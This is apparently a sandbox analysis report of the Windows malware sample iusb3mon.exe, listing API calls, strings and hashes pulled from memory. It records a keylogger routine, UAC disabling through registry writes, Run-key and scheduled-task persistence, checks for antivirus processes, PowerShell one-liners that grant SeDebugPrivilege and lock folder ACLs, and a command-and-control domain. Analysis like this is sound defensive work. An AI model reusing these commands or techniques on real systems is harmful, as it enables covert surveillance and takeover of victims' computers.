CopyFileA.KERNEL32(?,C:\Windows\svchost.exe,00000000), ref: 04D76D2F
Sleep.KERNEL32(000001F4), ref: 04D76D56

Strings

powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA, xrefs: 04D768B6
C:\odbc.ini, xrefs: 04D7680C
C:\inst.ini, xrefs: 04D76805
C:\Windows\svchost.exe, xrefs: 04D76D23, 04D76D27
360tray.exe, xrefs: 04D76881, 04D76993
C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log, xrefs: 04D7681A
C:\ProgramData\Data\upx.rar, xrefs: 04D76874
C:\ProgramData\Program, xrefs: 04D76848, 04D76B86
Cdefghij Lmnopqrst Vwxyabc Efghijkl Nop, xrefs: 04D76D3A
C:\ProgramData\Microsoft\Program, xrefs: 04D7683D
C:\tzfz, xrefs: 04D767F0
C:\2.ini, xrefs: 04D767FE
http://%s/ip.txt, xrefs: 04D76AB7
C:\un.exe, xrefs: 04D76869
huazai168.com, xrefs: 04D769F8, 04D76A38, 04D76AB0, 04D76B17, 04D76B2A
iiiiiiiiiiiii.exe, xrefs: 04D769C8
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 04D768A6
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 04D76C16
C:\odbc.inst.ini, xrefs: 04D76813
Mozilla/4.0 (compatible), xrefs: 04D76A9A
C:\ProgramData, xrefs: 04D76853
Cdefgh Jklmnopq Stuvwxya Cdef, xrefs: 04D76D3F
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P, xrefs: 04D768AE
C:\ProgramData\Data\upx.exe, xrefs: 04D7685E
iiiiiiiiiiiiiiii.exe, xrefs: 04D7698C
C:\del, xrefs: 04D767E9
C:\ProgramData\Program\iusb3mon.exe, xrefs: 04D76832
c:\inst.ini, xrefs: 04D76967, 04D769A3
C:\1.ini, xrefs: 04D767F7
360Tray.exe, xrefs: 04D76890, 04D76957
C:\ProgramData\Microsoft\Program\ziliao.jpg, xrefs: 04D76824

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Thread$Create$Delete$Internet$Close$ExecHandleModuleNameOpenSleep$CopyProcess32$AttributesCtrlCurrentDispatcherExecutionExitFirstNextProcessReadServiceSnapshotStartStartupStateToolhelp32Valueconnecthtonsinet_addrsocket
String ID: 360Tray.exe$360tray.exe$C:\1.ini$C:\2.ini$C:\ProgramData$C:\ProgramData\Data\upx.exe$C:\ProgramData\Data\upx.rar$C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log$C:\ProgramData\Microsoft\Program$C:\ProgramData\Microsoft\Program\ziliao.jpg$C:\ProgramData\Program$C:\ProgramData\Program\iusb3mon.exe$C:\Windows\svchost.exe$C:\del$C:\inst.ini$C:\odbc.ini$C:\odbc.inst.ini$C:\tzfz$C:\un.exe$Cdefgh Jklmnopq Stuvwxya Cdef$Cdefghij Lmnopqrst Vwxyabc Efghijkl Nop$Mozilla/4.0 (compatible)$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$c:\inst.ini$http://%s/ip.txt$huazai168.com$iiiiiiiiiiiii.exe$iiiiiiiiiiiiiiii.exe$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')$powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA
API String ID: 1792369710-133950496
Opcode ID: 97490d02c474b4550f90b14f2126dad3be411ba152998420024551335d246797
Instruction ID: ebd1062451407f1fa1d1e8d554581dcad89196045d154ff26f69927cc8b8d776
Opcode Fuzzy Hash: 97490d02c474b4550f90b14f2126dad3be411ba152998420024551335d246797
Instruction Fuzzy Hash: 5AE172B1A4065DBEFB10ABA49C89EBF7FADEB05768F040159F104E1241E674AE448F71

Function 00572170 Relevance: 79.3, APIs: 35, Strings: 10, Instructions: 549
sleepcomwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00002710,110D3D80), ref: 005721A2
CoInitializeEx.OLE32(00000000,00000000), ref: 005721AC
CoCreateInstance.COMBASE(0058F104,00000000,00000001,0058F0F4,?), ref: 005721EC
CoUninitialize.COMBASE ref: 00572209

Part of subcall function 00572DE0: std::_Lockit::_Lockit.LIBCPMT ref: 00572E36
Part of subcall function 00572DE0: std::_Lockit::_Lockit.LIBCPMT ref: 00572E58
Part of subcall function 00572DE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00572E78
Part of subcall function 00572DE0: std::_Facet_Register.LIBCPMT ref: 00572EE5
Part of subcall function 00572DE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00572F01

_com_issue_error.COMSUPP ref: 005727CB
MessageBoxA.USER32(00000000,005989C0,005989B8,00001010), ref: 005727F1

Strings

Task registered successfully., xrefs: 00572757
Failed to register task., xrefs: 00572775
Failed to create task definition., xrefs: 00572499
Failed to get root folder., xrefs: 00572453
Failed to create Task Service inst ance., xrefs: 005721F6
User Name, xrefs: 005724E9
C:\ProgramData\program\iusb3mon.exe, xrefs: 00572587
Failed to initialize COM library., xrefs: 005721B6
Failed to connect to Task Service., xrefs: 005722D0, 00572394
UserLoginStartupTask, xrefs: 0057267D

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$CreateFacet_InitializeInstanceMessageRegisterSleepUninitialize_com_issue_error
String ID: C:\ProgramData\program\iusb3mon.exe$Failed to connect to Task Service.$Failed to create Task Service inst ance.$Failed to create task definition.$Failed to get root folder.$Failed to initialize COM library.$Failed to register task.$Task registered successfully.$User Name$UserLoginStartupTask
API String ID: 1252467509-2564446508
Opcode ID: 9dc81245504c8436a3d31bf1da536eb6e4f52a760a4768e40f72757294180a08
Instruction ID: 717782c7deb83ed5a69f7fbf8ab72f18ddb4f94f37f0afe86cc13ac38847e4ce
Opcode Fuzzy Hash: 9dc81245504c8436a3d31bf1da536eb6e4f52a760a4768e40f72757294180a08
Instruction Fuzzy Hash: D4226F70E00209DBDB10DFA8DD49BAEBBB8FF59304F108554E859FB251EB30A985DB61

Function 04D72BF0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 164
keyboardsynchronizationsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000000,KeyLogger), ref: 04D72C05
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04D72C0E
Sleep.KERNEL32(0000000A), ref: 04D72C6E
lstrlenA.KERNEL32(?), ref: 04D72C7B
GetKeyState.USER32(00000010), ref: 04D72CD9
GetAsyncKeyState.USER32(?), ref: 04D72CEC
GetKeyState.USER32(00000014), ref: 04D72CF9
GetKeyState.USER32(00000014), ref: 04D72D25

Strings

<BackSpace>, xrefs: 04D72D90
<Enter>, xrefs: 04D72DB0
KeyLogger, xrefs: 04D72BFE

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: State$AsyncCreateMutexObjectSingleSleepWaitlstrlen
String ID: <BackSpace>$<Enter>$KeyLogger
API String ID: 2104880762-1889060070
Opcode ID: 799084a2cc9aedb2ba26fb10179f67763b67bfb6cb18a3bd6ebf36eb511cb0d8
Instruction ID: 5097b0f4fd30f5f7cad054875b4745e7f99fa7a46d00d5951eb77e4fab949516
Opcode Fuzzy Hash: 799084a2cc9aedb2ba26fb10179f67763b67bfb6cb18a3bd6ebf36eb511cb0d8
Instruction Fuzzy Hash: 7B51E976A01698BFDF209FA4DC49B9A77B9EB44315F0080E5E505E7280F634EE458FA1

Function 04D71B6D Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60
registrysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000BB8), ref: 04D71B7A

Part of subcall function 04D71B34: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,04D71B85), ref: 04D71B47
Part of subcall function 04D71B34: GetProcAddress.KERNEL32(00000000), ref: 04D71B4E
Part of subcall function 04D71B34: GetCurrentProcess.KERNEL32(00000000,?,?,?,04D71B85), ref: 04D71B5E

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,-00000200,?), ref: 04D71BAD
RegSetValueExA.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004), ref: 04D71BCB
RegSetValueExA.ADVAPI32(?,EnableLUA,00000000,00000004,?,00000004), ref: 04D71BDC
RegSetValueExA.ADVAPI32(?,PromptOnSecureDesktop,00000000,00000004,?,00000004), ref: 04D71BED
RegCloseKey.ADVAPI32(?), ref: 04D71BF2

Strings

EnableLUA, xrefs: 04D71BD4
PromptOnSecureDesktop, xrefs: 04D71BE5
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 04D71BA0
ConsentPromptBehaviorAdmin, xrefs: 04D71BC3

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Value$AddressCloseCurrentHandleModuleOpenProcProcessSleep
String ID: ConsentPromptBehaviorAdmin$EnableLUA$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 3477048420-3549642244
Opcode ID: 0c71843de4b2eb7d9328623142bde5d207e4a632dc93cac0b14fe49a8eadd43e
Instruction ID: 64fb99ab1151edd8ffcb04d8c693c4403b3f778c94192baf4b9f123a0233dc20
Opcode Fuzzy Hash: 0c71843de4b2eb7d9328623142bde5d207e4a632dc93cac0b14fe49a8eadd43e
Instruction Fuzzy Hash: 89014CB1A6010CFFEB01ABA1DC8AEEF7F7CEB82754F10056AB501E1150D6746E04DA70

Function 04D75CE6 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 04D75CF6
Process32First.KERNEL32(00000000,?), ref: 04D75D0F
Process32Next.KERNEL32(00000000,00000128), ref: 04D75D2A
CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 04D75D4F

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 770ba0e7218b3e1b2b28229525c480feb57e52670af9abf3f7430f19b4150a41
Instruction ID: 3483739597aa71443a8fa02a2dd92ff8c6d4e352cc2e8577bb603e3e06092ad7
Opcode Fuzzy Hash: 770ba0e7218b3e1b2b28229525c480feb57e52670af9abf3f7430f19b4150a41
Instruction Fuzzy Hash: 21F036716052196BFB60ABA5DC84FFAB7BCEF49368F1000ADE944D2140FE74E9954A31

Function 04D75E1F Relevance: 68.6, APIs: 32, Strings: 7, Instructions: 330
registrysleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04D75CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 04D75CF6
Part of subcall function 04D75CE6: Process32First.KERNEL32(00000000,?), ref: 04D75D0F
Part of subcall function 04D75CE6: Process32Next.KERNEL32(00000000,00000128), ref: 04D75D2A
Part of subcall function 04D75CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 04D75D4F

RegOpenKeyExA.ADVAPI32(80000002,04D9D344,00000000,00020119,?), ref: 04D75E63
Sleep.KERNEL32(Q360SafeMonClass), ref: 04D75E9D
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 04D75EA9
Sleep.KERNEL32(C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 04D75F0A
WinExec.KERNEL32(04D9D22C,00000000), ref: 04D75F16
RegOpenKeyExA.ADVAPI32(80000002,04D9D344,00000000,00020119,?), ref: 04D75F49
Sleep.KERNEL32(Q360SafeMonClass), ref: 04D75F80
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 04D75F8C
RegOpenKeyExA.ADVAPI32(80000002,04D9D344,00000000,00020119,?), ref: 04D75FF6
Sleep.KERNEL32(000007D0), ref: 04D76283

Part of subcall function 04D75DA7: FindWindowA.USER32(?,00000000), ref: 04D75DB1
Part of subcall function 04D75DA7: PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 04D75DE5
Part of subcall function 04D75DA7: SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 04D75DF0

Sleep.KERNEL32(Q360SafeMonClass), ref: 04D76035
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 04D76041
Sleep.KERNEL32(C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 04D7609F
WinExec.KERNEL32(04D9D22C,00000000), ref: 04D760AB
Sleep.KERNEL32(Q360SafeMonClass), ref: 04D760E1
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 04D760ED

Part of subcall function 04D77B7D: __EH_prolog.LIBCMT ref: 04D77B82

Part of subcall function 04D77109: __EH_prolog.LIBCMT ref: 04D7710E

Part of subcall function 04D77AC4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,00000000,04DA8518,04D76098,C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 04D77ADA
Part of subcall function 04D77AC4: WriteFile.KERNEL32(00000000,04D98760,00000EE2,?,00000000), ref: 04D77AF2
Part of subcall function 04D77AC4: CloseHandle.KERNEL32(00000000), ref: 04D77AFF

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F023F,?,0000000A), ref: 04D76152
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D7615F
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 04D7617B
RegCloseKey.ADVAPI32(?), ref: 04D76185
RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F013F,?), ref: 04D761A0
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D761B0
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 04D761CC
RegCloseKey.ADVAPI32(?), ref: 04D761D6
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F023F,?), ref: 04D761F1
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D76201
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 04D7621D
RegCloseKey.ADVAPI32(?), ref: 04D76227
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F013F,?), ref: 04D76242
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D76252
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 04D7626E
RegCloseKey.ADVAPI32(?), ref: 04D76278

Strings

QQPCTray.exe, xrefs: 04D75E3B
Q360SafeMonClass, xrefs: 04D75E8C, 04D75EA4, 04D75F6F, 04D75F87, 04D76024, 04D7603C, 04D760D0, 04D760E8
C:\ProgramData\Program\iusb3mon.exe, xrefs: 04D75E36, 04D7616E, 04D761B6, 04D761BF, 04D76207, 04D76210, 04D76258, 04D76261
Microsoft, xrefs: 04D760B1, 04D76172, 04D761C3, 04D76214, 04D76265
C:\ProgramData\Microsoft\MicrosoftNetFramework.xml, xrefs: 04D75EF9, 04D7608E
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 04D760B6, 04D76148, 04D76196, 04D761E7, 04D76238
qqpctray.exe, xrefs: 04D75F21

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: OpenSleep$CloseFile$FindWindow$ModuleNameValue$CreateExecH_prologHandleMessageProcess32$FirstNextPostSendSnapshotToolhelp32Write
String ID: C:\ProgramData\Microsoft\MicrosoftNetFramework.xml$C:\ProgramData\Program\iusb3mon.exe$Microsoft$Q360SafeMonClass$QQPCTray.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$qqpctray.exe
API String ID: 3575359619-3011562891
Opcode ID: e505597bf931d05811f3804b08dce03dc15c437aed255dbafe7e93330cb525b5
Instruction ID: a70496afe723019deaf1c049a088d2781a569366b797d56230cd8e2817d5c603
Opcode Fuzzy Hash: e505597bf931d05811f3804b08dce03dc15c437aed255dbafe7e93330cb525b5
Instruction Fuzzy Hash: A8A13C71348305FFFB08BB60AC55E7A7BD9EB80759F00081DFA45E5191EA69BC488E72

Function 04D76587 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 163
filesleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D765AB
CreateDirectoryA.KERNEL32(?,00000000), ref: 04D76600
SetFileAttributesA.KERNEL32(?,00000002,0000000A), ref: 04D7663D
WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 04D76668

Part of subcall function 04D77B7D: __EH_prolog.LIBCMT ref: 04D77B82

Part of subcall function 04D77109: __EH_prolog.LIBCMT ref: 04D7710E

GetFileAttributesA.KERNEL32(C:\ProgramData\Program\iusb3mon.exe), ref: 04D76673
CopyFileA.KERNEL32(?,?,00000000), ref: 04D76690
CopyFileA.KERNEL32(C:\ProgramData\iusb3mon.dat,C:\ProgramData\Program\iusb3mon.dat,00000001), ref: 04D766C6
CopyFileA.KERNEL32(C:\ProgramData\templateWatch.dat,C:\ProgramData\Program\templateWatch.dat,00000001), ref: 04D766D5
Sleep.KERNEL32(000000C8), ref: 04D766DC
WinExec.KERNEL32(cmd /c echo.>c:\inst.ini,00000000), ref: 04D76739
Sleep.KERNEL32(000000C8), ref: 04D76744

Strings

C:\ProgramData\Program\, xrefs: 04D765B8
: Not Exist, xrefs: 04D7660E
360tray.exe, xrefs: 04D76712
C:\ProgramData\Program, xrefs: 04D765E7
C:\ProgramData\templateWatch.dat, xrefs: 04D766D0
C:\ProgramData\iusb3mon.dat, xrefs: 04D766C1
C:\ProgramData\Program\templateWatch.dat, xrefs: 04D766C8, 04D766CF, 04D766F8
C:\ProgramData\Program\iusb3mon.dat, xrefs: 04D766B9, 04D766C0, 04D766F0
C:\ProgramData\Program\iusb3mon.exe, xrefs: 04D7666E, 04D766E4
cmd /c echo.>c:\inst.ini, xrefs: 04D76734
c:\inst.ini, xrefs: 04D76722
iusb3mon.exe, xrefs: 04D765D9
360Tray.exe, xrefs: 04D76703
Create Successed!, xrefs: 04D76643
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 04D76663

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Copy$AttributesExecH_prologSleep$CreateDirectoryModuleName
String ID: : Not Exist$360Tray.exe$360tray.exe$C:\ProgramData\Program$C:\ProgramData\Program\$C:\ProgramData\Program\iusb3mon.dat$C:\ProgramData\Program\iusb3mon.exe$C:\ProgramData\Program\templateWatch.dat$C:\ProgramData\iusb3mon.dat$C:\ProgramData\templateWatch.dat$Create Successed!$c:\inst.ini$cmd /c echo.>c:\inst.ini$iusb3mon.exe$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')
API String ID: 1478482640-228079196
Opcode ID: 31a2a8ccf214a92c21303d8ffd9af0f6494be6dbc914de28562efce3df9af554
Instruction ID: 192499ddfe9738e1eba20ac17bb5738e6050a11724ecb2da9867ad64f4cb2ad3
Opcode Fuzzy Hash: 31a2a8ccf214a92c21303d8ffd9af0f6494be6dbc914de28562efce3df9af554
Instruction Fuzzy Hash: 9241913234434077FA14B6B16C5AFAF37D9DB85B64F54091DF504DA1C0FEA8B9488AB2

Function 04D7650A Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 55
sleepwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowA.USER32(00000000,04D9DD60), ref: 04D76521
ShowWindow.USER32(00000000,00000000), ref: 04D76525
FindWindowA.USER32(00000000,04D9DD54), ref: 04D7652D
ShowWindow.USER32(00000000,00000000), ref: 04D76531
FindWindowA.USER32(00000000,04D9DD44), ref: 04D76539
ShowWindow.USER32(00000000,00000000), ref: 04D7653D
FindWindowA.USER32(00000000,04D9DD38), ref: 04D76545
ShowWindow.USER32(00000000,00000000), ref: 04D76549
FindWindowA.USER32(00000000,---------==============), ref: 04D76551
ShowWindow.USER32(00000000,00000000), ref: 04D76555
FindWindowA.USER32(00000000,===========-----------), ref: 04D7655D
ShowWindow.USER32(00000000,00000000), ref: 04D76561
FindWindowA.USER32(00000000,04D9DCF8), ref: 04D76569
SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 04D76574
Sleep.KERNEL32(000000C8), ref: 04D7657F

Strings

===========-----------, xrefs: 04D76557
---------==============, xrefs: 04D7654B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

